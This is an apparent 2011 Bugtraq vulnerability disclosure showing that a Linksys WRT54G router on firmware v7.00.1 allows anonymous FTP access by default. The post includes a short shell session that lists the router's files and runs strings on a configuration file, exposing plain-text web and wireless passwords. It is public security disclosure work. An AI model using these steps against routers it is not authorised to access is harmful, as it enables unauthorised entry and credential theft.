Bugtraq mailing list archives
Linksys WRT54G - read router password from file placed on FTP
From: rafdw () poczta fm
Date: Fri, 8 Apr 2011 18:15:36 -0600
Environment: Linksys WRT54G - Firmware Version: v7.00.1 Default settings of Linksys WRT54G allows to get FTP without password: rafal@localhost ~ $ lftp 192.168.1.1 lftp 192.168.1.1:~> dir size date time name -------- ------ ------ -------- 956756 Jan-01-2003 02:13:12 ap61.sys 224664 Jan-01-2003 02:13:24 igwhtm.dat 28528 Jan-01-2003 02:13:26 langpak_en 28482 Apr-08-2011 15:36:44 igwpricf.dat 2520 Apr-08-2011 15:11:02 nvram.cfg 2046 Dec-24-2001 00:02:42 calibra.dat lftp 192.168.1.1:~> It is possible to download igwpricf.dat file (and another) where plain-text password to web access and wireless network are keeping. rafal@localhost ~ $ strings igwpricf.dat Linksys IntotoSoft 192.168.50.3 ... Aadmin PASSWORD test best ... WIRELESS_PASSWORD ... default langpak_en TELNET HTTP SMTP POP3 ----------------- RaFD
Current thread:
- Linksys WRT54G - read router password from file placed on FTP rafdw (Apr 11)